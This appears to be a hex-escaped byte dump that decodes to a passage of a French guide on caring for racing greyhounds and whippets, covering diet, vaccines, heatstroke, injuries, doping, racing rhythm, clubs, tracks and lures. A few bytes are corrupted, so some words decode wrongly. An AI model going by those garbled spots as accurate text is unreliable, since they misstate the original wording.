-"\x61\x73\x20\x70\x61\x72\x20\x6a\x6f\x75\x72\x20\x71\x75\x27\x75" -"\x6e\x20\x73\x65\x75\x6c\x2e\x20\x41\x74\x74\x65\x6e\x74\x69\x6f" -"\x6e\x20\x61\x75\x78\x20\x65\x78\x63\xe8\x73\x20\x64\x65\x20\x63" -"\x61\x6c\x63\x69\x75\x6d\x2c\x20\x64\x65\x20\x70\x68\x6f\x73\x70" -"\x68\x6f\x72\x65\x2c\x20\x64\x65\x20\x76\x69\x74\x61\x6d\x69\x6e" -"\x65\x73\x20\x44\x2e\x20\x4e\x65\x20\x64\x6f\x6e\x6e\x65\x7a\x20" -"\x70\x61\x73\x20\x75\x6e\x20\x72\x65\x70\x61\x73\x20\x63\x6f\x6d" -"\x70\x6c\x65\x74\x20\x6c\x65\x20\x6a\x6f\x75\x72\x20\x64\x65\x73" -"\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x0d\x46\x61\x69\x74\x65\x73" -"\x20\x62\x6f\x69\x72\x65\x20\x6d\x6f\x64\xe9\x72\xe9\x6d\x65\x6e" -"\x74\x2c\x20\x64\x65\x20\x6c\x27\x65\x61\x75\x20\x6e\x6f\x6e\x20" -"\x67\x6c\x61\x63\xe9\x65\x2c\x20\x61\x70\x72\xe8\x73\x20\x6c\x65" -"\x96\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x0d\x0d\x53\x6f\x69\x6e" -"\x73\x20\x3a\x0d\x0d\x09\x43\x68\x61\x6c\x65\x75\x72\x73\x20\x3a" -"\x0d\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74" -"\x20\x64\x27\x61\x6d\x65\x6e\x65\x72\x20\x75\x6e\x65\x20\x66\x65" -"\x6d\x65\x6c\x6c\x65\x20\x65\x6e\x20\x63\x68\x61\x6c\x65\x75\x72" -"\x73\x20\x61\x75\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x2c\x20" -"\x63\x65\x6c\x61\x20\x76\x61\x20\x70\x65\x72\x74\x75\x72\x62\x65" -"\x72\x20\x6d\xe2\x6c\x65\x73\x20\x65\x74\x20\x66\x65\x6d\x65\x6c" 
-"\x6c\x65\x73\x2e\x0d\x0d\x09\x56\x61\x63\x63\x69\x6e\x73\x3a\x0d" -"\x4c\x61\x20\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x20\x61" -"\x6e\x74\x69\x72\x61\x62\x69\x71\x75\x65\x20\x65\x73\x74\x20\x6f" -"\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65\x2e\x0d\x4c\x65\x73\x20" -"\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x73\x20\x63\x6f\x75" -"\x72\x61\x6e\x74\x65\x73\x20\x73\x6f\x6e\x74\x20\xe0\x20\x63\x6f" -"\x6e\x73\x65\x69\x6c\x6c\x65\x72\x2e\x0d\x0d\x09\x4d\x61\x73\x73" -"\x61\x67\x65\x73\x20\x65\x74\x20\xe9\x63\x68\x61\x75\x66\x66\x65" -"\x6d\x65\x6e\x74\x20\x3a\x0d\x49\x6c\x73\x20\x73\x6f\x6e\x74\x20" -"\xe0\x20\x63\x6f\x6e\x73\x65\x69\x6c\x6c\x65\x72\x2c\x20\x63\x6f" -"\x6d\x6d\x65\x20\x6c\x61\x20\x64\xe9\x74\x65\x6e\x74\x65\x20\x61" -"\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x2e\x0d" -"\x0d\x09\x54\xe9\x74\x61\x6e\x69\x65\x20\x3a\x0d\x43\x72\x69\x73" -"\x65\x20\x6e\x65\x72\x76\x65\x75\x73\x65\x20\x73\x6f\x69\x74\x20" -"\x61\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20" -"\x28\x73\x70\x65\x63\x74\x61\x63\x75\x6c\x61\x69\x72\x65\x20\x65" -"\x74\x20\x62\x72\xe8\x76\x65\x29\x20\x73\x6f\x69\x74\x20\x70\x65" -"\x6e\x64\x61\x6e\x74\x20\x6c\x61\x20\x6c\x61\x63\x74\x61\x74\x69" -"\x6f\x6e\x2c\x20\x73\x75\x72\x74\x6f\x75\x74\x20\x20\x73\x69\x20" -"\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20\x64\x6f\x6e\x6e\xe9\x20" -"\x64\x65\x73\x20\x73\x75\x70\x70\x6c\xe9\x6d\x65\x6e\x74\x73\x20" -"\x64\x65\x20\x63\x61\x6c\x63\x69\x75\x6d\x20\x70\x65\x6e\x64\x61" -"\x6e\x74\x20\x6c\x61\x20\x67\x65\x73\x74\x61\x74\x69\x6f\x6e\x2e" -"\x0d\x0d\x09\x50\x69\x73\x73\x65\x6d\x65\x6e\x74\x20\x64\x65\x20" -"\x73\x61\x6e\x67\x20\x28\x72\x68\x61\x62\x64\x6f\x6d\x79\x6f\x6c" -"\x79\x73\x65\x29\x3a\x0d\x55\x72\x69\x6e\x65\x73\x20\x62\x72\x75" -"\x6e\x65\x73\x20\x74\x72\x61\x64\x75\x69\x73\x61\x6e\x74\x20\x73" -"\x6f\x69\x74\x20\x75\x6e\x65\x20\x70\x69\x72\x6f\x70\x6c\x61\x73" -"\x6d\x6f\x73\x65\x2c\x20\x73\x6f\x69\x74\x20\x64\x65\x73\x20\x6d" 
-"\x69\x63\x72\x6f\x63\x6c\x61\x71\x75\x61\x67\x65\x73\x20\x65\x6e" -"\x20\x63\x6f\x75\x72\x73\x65\x73\x2c\x20\x73\x6f\x69\x74\x20\x75" -"\x6e\x65\x20\x61\x75\x74\x72\x65\x20\x6d\x61\x6c\x61\x64\x69\x65" -"\x2e\x0d\x0d\x09\x43\x6f\x75\x70\x20\x64\x65\x20\x63\x68\x61\x6c" -"\x65\x75\x72\x20\x3a\x0d\x41\x63\x63\x69\x64\x65\x6e\x74\x20\x67" -"\xe7\x61\x76\x65\x20\x61\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f" -"\x75\x72\x73\x65\x2c\x20\x73\x27\x69\x6c\x20\x66\x61\x69\x74\x20" -"\x63\x68\x61\x75\x64\x2c\x20\x73\x27\x69\x6c\x20\x79\x20\x61\x20" -"\x65\x75\x20\x63\x65\x72\x74\x61\x69\x6e\x73\x20\x64\x6f\x70\x61" -"\x6e\x74\x73\x2c\x20\x73\x69\x20\x6c\x65\x20\x73\x75\x6a\x65\x74" -"\x20\x65\x73\x74\x20\x65\x6e\x20\x6d\x61\x75\x76\x61\x69\x73\x65" -"\x20\xe9\x74\x61\x74\x2e\x20\x4c\x61\x20\x74\x65\x6d\x70\xe9\x72" -"\x61\x74\x75\x72\x65\x20\x6d\x6f\x6e\x74\x65\x20\xe0\x20\x70\x6c" -"\x75\x73\x20\x64\x65\x20\x34\x30\x2e\x20\x52\x65\x66\x72\x6f\x69" -"\x64\x69\x72\x20\x6c\x65\x20\x63\x6f\x72\x70\x73\x20\x65\x74\x20" -"\x6c\x61\x20\x74\xea\x74\x65\x20\x65\x74\x20\x70\x6f\x72\x74\x65" -"\x72\x20\x63\x68\x65\x7a\x20\x75\x6e\x20\x76\xe9\x74\xe9\x72\x69" -"\x6e\x61\x69\x72\x65\x2e\x0d\x0d\x09\x43\x6c\x61\x71\x75\x61\x67" -"\x65\x73\x2c\x20\x66\x72\x61\x63\x99\x75\x72\x65\x73\x20\x3a\x0d" -"\x41\x73\x73\x65\x7a\x20\x72\x61\x72\x65\x73\x2e\x20\x53\x75\x72" -"\x74\x6f\x75\x74\x20\x73\x75\x72\x20\x70\x69\x73\x74\x65\x73\x20" -"\x6d\x61\x6c\x20\x65\x6e\x74\x72\x65\x74\x65\x6e\x75\x65\x73\x20" -"\x61\x76\x65\x63\x20\x7a\x6f\x6e\x65\x73\x20\x64\x75\x72\x65\x73" -"\x20\x65\x74\x20\x6d\x6f\x6c\x6c\x65\x73\x20\x61\x6c\x74\x65\x72" -"\x6e\xe9\x65\x73\x2c\x20\x6f\x75\x20\x73\x75\x72\x20\x64\x65\x73" -"\x20\x63\x68\x69\x65\x6e\x73\x20\x6d\x61\x6c\x20\x6e\x6f\x75\x72" -"\x72\x69\x73\x20\x65\x74\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x61" -"\xee\x6e\xe9\x73\x2e\x0d\x0d\x09\x47\x72\x6f\x73\x20\x64\x6f\x69" -"\x67\x74\x73\x20\x3a\x0d\x4c\xe9\x73\x69\x6f\x6e\x73\x20\x61\x72" 
-"\x74\x69\x63\x75\x6c\x61\x69\x72\x65\x73\x2c\x20\x74\x61\x6e\x74" -"\xf4\x74\x20\x65\x6e\x74\x6f\x72\x73\x65\x73\x2c\x20\x74\x61\x6e" -"\x74\xf4\x74\x20\x74\x65\x6e\x64\x69\x6e\x69\x74\x65\x73\x2c\x20" -"\x74\x61\x6e\x74\xf4\x74\x20\x66\x6f\x75\x72\x62\x75\x72\x65\x2c" -"\x20\x73\x75\x72\x20\x63\x68\x69\x65\x6e\x73\x20\x72\x61\x70\x69" -"\x64\x65\x73\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x6c\x6f\x75" -"\x72\x64\x73\x2c\x20\xe0\x20\x6c\x27\x6f\x63\x63\x61\x73\x69\x6f" -"\x6e\x20\x64\x65\x20\x62\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x73" -"\x2c\x20\x64\x65\x20\x6d\x61\x75\x76\x61\x69\x73\x20\x66\x72\x65" -"\x69\x6e\x61\x67\x65\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9" -"\x65\x2c\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x64\x65\x20\x70\x69" -"\x73\x74\x65\x73\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x65\x74\x65" -"\x6e\x75\x65\x73\x2e\x0d\x49\x6c\x73\x20\x73\x75\x72\x76\x69\x65" -"\x6e\x6e\x65\x6e\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x65\x6e" -"\x20\x70\x6c\x65\x69\x6e\x65\x20\x73\x61\x69\x73\x6f\x6e\x20\x73" -"\x75\x72\x20\x6c\x65\x73\x20\x73\x75\x6a\x65\x74\x73\x20\x66\x61" -"\x74\x69\x67\x75\xe9\x73\x2c\x20\x6d\x61\x6c\x20\x64\xe9\x74\x6f" -"\x78\x69\x71\x75\xe9\x73\x2e\x0d\x49\x6c\x73\x20\x70\x65\x75\x76" -"\x65\x6e\x74\x20\xea\x74\x72\x65\x20\x62\xe9\x6e\x69\x6e\x73\x20" -"\x6f\x75\x20\x67\x72\x61\x76\x65\x73\x2e\x0d\x53\x65\x6c\x6f\x6e" -"\x20\x6c\x65\x73\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65" -"\x73\x2c\x20\x6f\x6e\x20\x74\x72\x61\x69\x74\x65\x20\x70\x61\x72" -"\x20\x63\x68\x69\x72\x75\x72\x67\x69\x65\x2c\x20\x70\x61\x72\x20" -"\x61\x6e\x74\x69\x69\x6e\x66\x6c\x61\x6d\x6d\x61\x74\x6f\x69\x72" -"\x65\x73\x2c\x20\x70\x61\x72\x20\x70\x61\x6e\x73\x65\x6d\x65\x6e" -"\x74\x2c\x20\x70\x61\x72\x20\x68\xe1\x6d\xe9\x6f\x70\x61\x74\x68" -"\x69\x65\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x6d\xe9\x74\x68\x6f" -"\x64\x65\x20\x61\x20\x64\x65\x73\x20\x73\x75\x63\x63\xe8\x73\x20" -"\x6f\x75\x20\x64\x65\x73\x20\xe9\x63\x68\x65\x63\x73\x2c\x20\x73" 
-"\x65\x6c\x6f\x6e\x20\x6c\x65\x73\x20\x63\x61\x73\x2e\x20\xe5\x6e" -"\x20\x61\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x73\x69\x67\x6e\x61" -"\x6c\xe9\x20\x64\x65\x73\x20\x63\x68\x75\x74\x65\x73\x20\x64\x65" -"\x20\x66\x6f\x72\x6d\x65\x20\x61\x70\x72\xe8\x73\x20\x63\x6f\x72" -"\x74\x69\x63\x6f\xef\x64\x65\x73\x2e\x0d\x0d\x09\x44\x6f\x70\x61" -"\x67\x65\x3a\x0d\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72" -"\x64\x69\x74\x20\x6d\x61\x69\x73\x20\x74\x72\x6f\x70\x20\x75\x74" -"\x69\x6c\x69\x73\xe9\x2e\x0d\x4c\x61\x20\x70\x6c\x75\x70\x61\x72" -"\x74\x20\x6e\x27\x6f\x6e\x74\x20\x61\x75\x63\x75\x6e\x65\x20\x61" -"\x63\x74\x69\x6f\x6e\x2e\x0d\x4c\x65\x73\x20\x64\x6f\x70\x61\x6e" -"\x74\x73\x20\x73\x6f\x6e\x74\x20\x73\x6f\x69\x74\x20\x64\x65\x73" -"\x20\x72\x65\x74\x61\x72\x64\x61\x74\x65\x75\x72\x73\x20\x64\x65" -"\x20\x66\x61\x74\x69\x67\x75\x65\x20\x71\x75\x69\x20\x6e\x27\x6f" -"\x6e\x74\x20\x64\x27\x69\x6e\x74\xe9\x72\xea\x74\x20\x74\x68\xe9" -"\x6f\x72\x69\x71\x75\x65\x20\x71\x75\x65\x20\x70\x6f\x75\x72\x20" -"\x6c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x64\x65\x20\x70" -"\x6c\x75\x73\x20\x64\x65\x20\x31\x35\x30\x30\x20\x6d\xe8\x74\x72" -"\x65\x73\x2c\x20\x73\x6f\x69\x74\x20\x64\x65\x73\x20\x64\xe9\x66" -"\x61\x74\x69\x67\x61\x6e\x74\x73\x20\x71\x75\x69\x20\x6e\x65\x20" -"\x73\x65\x72\x76\x65\x6e\x74\x20\x71\x75\x27\x65\x6e\x20\x63\x61" -"\x73\x20\x64\x65\x20\x72\xe9\x70\xe9\x74\x69\x74\x69\x6f\x6e\x20" -"\xe0\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x6c\x65\x73\x20\x69\x6e" -"\x73\x75\x66\x66\x69\x73\x61\x6e\x74\x73\x2c\x20\x73\x6f\x69\x74" -"\x20\x64\x65\x73\x20\x70\x6f\x74\x65\x6e\x74\x69\x61\x6c\x69\x73" -"\x61\x74\x65\x75\x72\x73\x20\xe0\x20\x74\x72\xe8\x73\x20\x63\x6f" -"\x75\x72\x74\x65\x20\x64\x75\x72\xe9\x65\x20\x64\x27\x61\x63\x74" -"\x69\x6f\x6e\x2e\x20\x4c\x65\x73\x20\x64\x6f\x70\x61\x6e\x74\x73" -"\x20\x73\x6f\x6e\x74\x20\x74\x6f\x75\x6a\x6f\x75\x72\x73\x20\x64" -"\x61\x6e\x67\x65\x72\x65\x75\x78\x20\x70\x6f\x75\x72\x20\x6c\x65" 
-"\x20\x6c\xe9\x76\x72\x69\x65\x72\x2c\x20\x65\x74\x20\x69\x6c\x73" -"\x20\x73\x6f\x6e\x74\x20\x69\x6e\x75\x74\x69\x6c\x65\x73\x20\x73" -"\x75\x72\x20\x32\x30\x20\x73\x65\x63\x2e\x0d\x0d\x09\x52\x79\x74" -"\x68\x6d\x65\x20\x64\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20" -"\x3a\x0d\x45\x6e\x20\x70\x72\x69\x6e\x63\x69\x70\x65\x2c\x20\x6c" -"\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x70\x65\x75\x74\x20\x63" -"\x6f\x75\x72\x69\x72\x20\x73\x6f\x75\x76\x65\x6e\x74\x2c\x20\x69" -"\x6c\x20\x65\x73\x74\x20\x62\xe2\x74\x69\x20\x70\x6f\x75\x72\x20" -"\x63\x65\x6c\x61\x2e\x20\x4d\x61\x69\x73\x20\x65\x6e\x20\x63\x61" -"\x73\x20\x64\x65\x20\x6c\xe9\x73\x69\x6f\x6e\x20\x69\x6e\x61\x70" -"\x65\x72\xe7\x75\x65\x20\x69\x6c\x20\x70\x6f\x75\x72\x72\x61\x20" -"\x79\x20\x61\x76\x6f\x69\x72\x20\x62\x6c\x65\x73\x73\x75\x72\x65" -"\x20\x65\x74\x20\x6d\xe9\x66\x6f\x72\x6d\x65\x2c\x20\x63\x65\x20" -"\x71\x75\x69\x20\x63\x6f\x6e\x64\x75\x69\x74\x20\x63\x65\x72\x74" -"\x61\x69\x6e\x73\x20\xe0\x20\x6e\x65\x20\x72\xe9\x70\xe9\x74\x65" -"\x72\x20\x6c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x71\x75" -"\x65\x20\x72\x61\x72\x65\x6d\x65\x6e\x74\x2e\x20\x42\x69\x65\x6e" -"\x20\x6e\x6f\x75\x72\x72\x69\x20\x65\x74\x20\x62\x69\x65\x6e\x20" -"\x65\x6e\x74\x72\x61\xee\x6e\xe9\x2c\x20\x69\x6c\x20\x70\x65\x75" -"\x20\x63\x6f\x75\x72\x69\x72\x20\x74\x72\xe8\x73\x20\x66\x72\xe9" -"\x71\x75\x65\x6d\x6d\x65\x6e\x74\x2e\x0d\x4c\x65\x20\x72\x69\x73" -"\x71\x75\x65\x20\x64\x65\x20\x6c\xe9\x73\x69\x6f\x6e\x20\x69\x6e" -"\x61\x70\x65\x72\xe7\x75\x65\x20\x65\x73\x74\x20\x66\x69\x6e\x61" -"\x6c\x65\x6d\x65\x6e\x74\x20\x6c\x65\x20\x70\x72\x69\x6e\x63\x69" -"\x70\x61\x6c\x20\x63\x61\x73\x20\x63\x61\x72\x20\x69\x6c\x20\x65" -"\x6e\x74\x72\x61\xee\x6e\x65\x72\x61\x20\x75\x6e\x20\x61\x63\x63" -"\x69\x64\x65\x6e\x74\x2c\x20\x61\x74\x74\x72\x69\x62\x75\xe9\x20" -"\xe0\x20\x6c\x61\x20\x70\x69\x73\x74\x65\x2c\x20\x61\x75\x20\x74" -"\x65\x6d\x70\x73\x2c\x20\xe0\x20\x75\x6e\x20\x61\x63\x63\x69\x64" 
-"\x65\x6e\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x2c\x20\x65" -"\x74\x63\x2e\x2e\x2e\x0d\x41\x70\x72\xe8\x73\x20\x6c\x61\x20\x72" -"\xe9\x75\x6e\x69\x6f\x6e\x20\x65\x78\x61\x6d\x69\x6e\x65\x7a\x20" -"\x65\x74\x20\x6e\x65\x74\x74\x6f\x79\x65\x7a\x20\x6c\x65\x73\x20" -"\x70\x69\x65\x64\x73\x2c\x20\x70\x61\x6c\x70\x65\x7a\x20\x62\x69" -"\x65\x6e\x20\x6c\x65\x73\x20\xe9\x70\x61\x75\x6c\x65\x73\x2c\x20" -"\x6c\x65\x73\x20\x63\x75\x69\x73\x73\x65\x73\x2c\x20\x6c\x65\x73" -"\x20\x61\x72\x74\x69\x63\x75\x6c\x61\x74\x69\x6f\x6e\x73\x2e\x20" -"\x45\x6e\x20\x63\x61\x73\x20\x64\x65\x20\x64\x6f\x75\x74\x65\x2c" -"\x20\x6d\x65\x74\x74\x65\x7a\x20\x6c\x65\x20\xe0\x20\x75\x6e\x20" -"\x72\x65\x70\x6f\x73\x20\x72\x65\x6c\x61\x74\x69\x66\x20\x28\x70" -"\x61\x73\x20\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x29\x2e\x0d\x4e" -"\x65\x20\x6c\x61\x69\x73\x73\x65\x7a\x20\x6a\x61\x6d\x61\x69\x73" -"\x20\x70\x61\x73\x73\x65\x72\x20\x75\x6e\x20\x6d\x61\x75\x76\x61" -"\x69\x73\x20\x63\x68\x72\x6f\x6e\x6f\x20\x73\x61\x6e\x73\x20\x63" -"\x61\x75\x73\x65\x20\x28\x64\x65\x20\x63\x68\x75\x74\x65\x29\x2c" -"\x20\x73\x6f\x79\x65\x7a\x20\x70\x72\x75\x64\x65\x6e\x74\x20\x70" -"\x6f\x75\x72\x20\x61\x63\x63\x65\x48\x74\x65\x72\x20\x6c\x61\x20" -"\x63\x6f\x75\x72\x73\x65\x20\x73\x75\x69\x76\x61\x6e\x74\x65\x2e" -"\x0d\x43\x27\x65\x73\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x75" -"\x6e\x20\x73\x69\x67\x6e\x65\x20\x70\x72\xe9\x63\x75\x72\x73\x65" -"\x75\x72\x20\x64\x27\x65\x6e\x6e\x75\x69\x73\x2e\x20\x55\x6e\x20" -"\x63\x68\x69\x65\x6e\x20\x62\x69\x65\x6e\x20\x65\x6e\x74\x72\x61" -"\xee\x6e\xe9\x20\x70\x65\x75\x74\x20\x66\x72\xe9\x71\x75\x65\x6d" -"\x6d\x65\x6e\x74\x20\x72\xe9\x70\xe9\x74\x65\x72\x20\x73\x65\x73" -"\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x20\x55\x6e\x20\x63\x68\x69" -"\x65\x6e\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x61\xee\x6e\xe9\x20" -"\x6e\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x2e\x20\x4d\x61\x69" -"\x73\x20\x63\x27\x65\x73\x74\x20\x61\x75\x73\x73\x69\x20\x61\x66" 
-"\x66\x61\x69\x72\x65\x20\x64\x27\x69\x6e\x64\x69\x76\x69\x64\x75" -"\x2c\x20\x61\x76\x65\x63\x20\x20\x64\x65\x20\x76\x69\x76\x65\x73" -"\x20\x63\x6f\x6e\x74\x72\x6f\x76\x65\x72\x73\x65\x73\x2e\x0d\x0d" -"\x51\x75\x65\x6c\x71\x75\x65\x73\x20\x72\x65\x6e\x73\x65\x69\x67" -"\x6e\x65\x6d\x65\x6e\x74\x73\x20\x69\x6e\x74\xe9\x72\x65\x73\x73" -"\x61\x6e\x74\x73\x20\x3a\x0d\x0d\x09\x43\x6c\x75\x62\x73\x20\x20" -"\x61\x67\x72\xe9\xe9\x73\x20\x3a\x0d\x41\x73\x73\x6f\x63\x69\x61" -"\x74\x69\x6f\x6e\x20\x31\x39\x30\x31\x20\x61\x67\x72\xe9\xe9\x65" -"\x20\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69" -"\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x65\x6e\x20\x61" -"\x63\x63\x6f\x72\x64\x20\x61\x76\x65\x63\x20\x6c\x61\x20\x53\x6f" -"\x63\x69\xe9\x74\xe9\x20\x43\x61\x6e\x69\x6e\x65\x20\x6c\x6f\x63" -"\x61\x6c\x65\x2e\x20\x49\x6c\x20\x6e\x65\x20\x70\x65\x75\x74\x20" -"\x79\x20\x65\x6e\x20\x61\x76\x6f\x69\x72\x20\x71\x75\x27\x75\x6e" -"\x20\x73\x65\x75\x6c\x20\x70\x61\x72\x20\x72\x61\x79\x6f\x6e\x20" -"\x64\x65\x20\x37\x35\x4b\x6d\x20\x73\x69\x20\x6c\x61\x20\x70\x69" -"\x73\x74\x65\x20\x65\x73\x74\x20\x72\xe9\x73\x65\x72\x76\xe9\x65" -"\x20\x61\x75\x78\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x73\x70" -"\x6f\x72\x74\x69\x76\x65\x73\x2c\x20\x64\x65\x20\x35\x30\x4b\x6d" -"\x20\x73\x69\x20\x65\x6c\x6c\x65\x20\x65\x73\x74\x20\x70\x61\x72" -"\x74\x61\x67\xe9\x65\x20\x61\x76\x65\x63\x20\x75\x6e\x65\x20\x53" -"\x6f\x63\x69\xe9\x74\xe9\x20\xe0\x20\x50\x61\x72\x69\x20\x4d\x75" -"\x74\x75\x65\x6c\x2e\x0d\x49\x6c\x20\x65\x73\x74\x20\x70\x61\x72" -"\x66\x61\x69\x74\x65\x6d\x65\x6e\x74\x20\x61\x75\x74\x6f\x72\x69" -"\x73\xe9\x20\x65\x6e\x20\x46\x72\x61\x6e\x63\x65\x20\x64\x65\x20" -"\x64\x69\x73\x70\x75\x74\x65\x72\x20\x6c\x65\x73\x20\xe9\x70\x72" -"\x65\x75\x76\x65\x73\x20\x64\x65\x20\x6c\x61\x20\x46\xe9\x64\xe9" -"\x72\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x53\x6f\x63\x69\xe9" -"\x74\xe9\x73\x20\x64\x65\x20\x43\x6f\x75\x72\x73\x65\x73\x20\x28" 
-"\x63\x6f\x75\x72\x73\x65\x73\x20\x61\x76\x65\x63\x20\x70\x61\x72" -"\x69\x20\x6d\x75\x74\x75\x65\x6c\x29\x20\x20\x71\x75\x69\x20\x61" -"\x20\x73\x6f\x6e\x20\x70\x72\x6f\x70\x72\x65\x20\x72\xe8\x67\x6c" -"\x65\x6d\x65\x6e\x74\x20\x28\x63\x6f\x64\x65\x20\x64\x65\x73\x20" -"\x63\x6f\x75\x72\x73\x65\x73\x29\x20\x65\x74\x20\x73\x65\x73\x20" -"\x70\x72\x6f\x70\x72\x65\x73\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74" -"\x73\x20\x28\x6c\x69\x76\x72\x65\x74\x73\x29\x2e\x0d\x0d\x09\x43" -"\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x73\x20\x3a\x0d\x50\x69\x73\x74" -"\x65\x73\x20\x61\x67\x72\xe9\xe9\x65\x73\x2c\x20\x64\x6f\x6e\x74" -"\x20\x6c\x65\x73\x20\x63\x6f\x74\x65\x73\x20\x6f\x6e\x74\x20\xe9" -"\x74\xe9\x20\x6d\x65\x73\x75\x72\xe9\x65\x73\x20\x70\x61\x72\x20" -"\x75\x6e\x20\x65\x78\x70\x65\x72\x74\x20\x61\x67\x72\xe9\xe9\x2c" -"\x20\x61\x76\x65\x63\x20\x75\x6e\x20\x72\x61\x79\x6f\x6e\x20\x6d" -"\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x20\x34\x30\x6d\x2e\x0d\x49" -"\x6c\x73\x20\x70\x65\x75\x76\x65\x6e\x74\x20\x61\x76\x6f\x69\x72" -"\x20\x75\x6e\x65\x20\x70\x69\x73\x74\x65\x20\x65\x6e\x20\x68\x65" -"\x72\x62\x65\x2c\x20\x65\x6e\x20\x73\x61\x62\x6c\x65\x2c\x20\x65" -"\x6e\x20\x67\x61\x7a\x6f\x6e\x20\x73\x75\x72\x20\x73\x61\x62\x6c" -"\x65\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x73\x6f\x6c\x20\x61\x20" -"\x73\x65\x73\x20\x64\xe9\x66\x65\x6e\x73\x65\x75\x72\x73\x20\x65" -"\x74\x20\x73\x65\x73\x20\x64\xe9\x74\x72\x61\x63\x74\x65\x75\x72" -"\x73\x2e\x0d\x0d\x09\x4c\x65\x75\x72\x72\x65\x20\x3a\x0d\x4c\x65" -"\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x73\x74\x20\x63\x6f\x6e\x73" -"\x74\x69\x74\x75\xe9\x20\x64\x65\x20\x72\x75\x62\x61\x6e\x73\x20" -"\x15\x6c\x61\x73\x74\x69\x71\x75\x65\x20\x70\x6f\x75\x72\x20\x6c" -"\x65\x73\x20\x45\x4e\x43\x2c\x20\x64\x65\x20\x70\x65\x61\x75\x20" -"\x64\x65\x20\x6c\x61\x70\x69\x6e\x20\x70\x6f\x75\x72\x20\x6c\x61" -"\x20\x50\x56\x4c\x2e\x20\x49\x6c\x20\x65\x73\x74\x20\x6d\xfb\x20" -"\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x75\x6e\x20\x63\xe2\x62\x6c" 
-"\x65\x20\x65\x6e\x72\x6f\x75\x6c\xe9\x20\x73\x75\x72\x20\x75\x6e" -"\x65\x20\x62\x6f\x62\x69\x6e\x65\x20\x28\x6c\x65\x75\x72\x72\x65" -"\x20\x66\x69\x63\x65\x6c\x6c\x65\x29\x20\x61\x76\x65\x63\x20\x70" -"\x6f\x75\x6c\x69\x65\x73\x20\x64\x65\x20\x72\x65\x6e\x76\x6f\x69" -"\x2c\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x75\x6e\x20\x73\x79" -"\x73\x74\xe8\x6d\x65\x20\x61\x75\x74\x6f\x70\x72\x6f\x70\x75\x6c" -"\x73\xe9\x20\x67\x75\x69\x64\xe9\x20\x70\x61\x72\x20\x75\x6e\x20" -"\x72\x61\x69\x6c\x2e\x0d\x0d\x09\x44\x69\x73\x74\x61\x6e\x63\x65" -"\x73\x20\x3a\x0d\x4c\x65\x73\x20\x64\x69\x73\x74\x61\x6e\x63\x65" -"\x73\x20\x66\x72\x61\x6e\xe7\x61\x69\x73\x65\x73\x20\x73\x6f\x6e" -"\x74\x20\x64\x27\x65\x6e\x76\x69\x72\x6f\x6e\x20\x34\x38\x30\x6d" -"\x20\x6f\x75\x20\x32\x35\x30\x6d\x20\x64\x65\x20\x66\x61\xe7\x6f" -"\x6e\x20\xe0\x20\x61\x76\x6f\x69\x72\x20\x64\x65\x73\x20\x64\xe9" -"\x70\x61\x72\x74\x73\x20\x65\x6e\x20\x6c\x69\x67\x6e\x65\x20\x64" -"\x72\x6f\x69\x74\x65\x20\x71\x75\x69\x20\x6c\x69\x6d\x69\x74\x65" -"\x6e\x74\x20\x62\x6c\x65\x73\x73\x75\x72\x65\x73\x20\x65\x74\x20" -"\x62\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x73\x2e\x20\x4c\x65\x73" -"\x20\x64\x69\x73\x74\x61\x6e\x63\x65\x73\x20\x69\x6e\x74\x65\x72" -"\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x70\x6f\x75\x72\x20" -"\x6c\x65\x73\x20\x77\x68\x69\x70\x70\x65\x74\x73\x20\x73\x6f\x6e" -"\x74\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x6d\x6f\x6d\x65\x6e\x74" -"\x20\x64\x65\x20\x33\x35\x30\x6d\x20\x63\x65\x20\x71\x75\x69\x20" 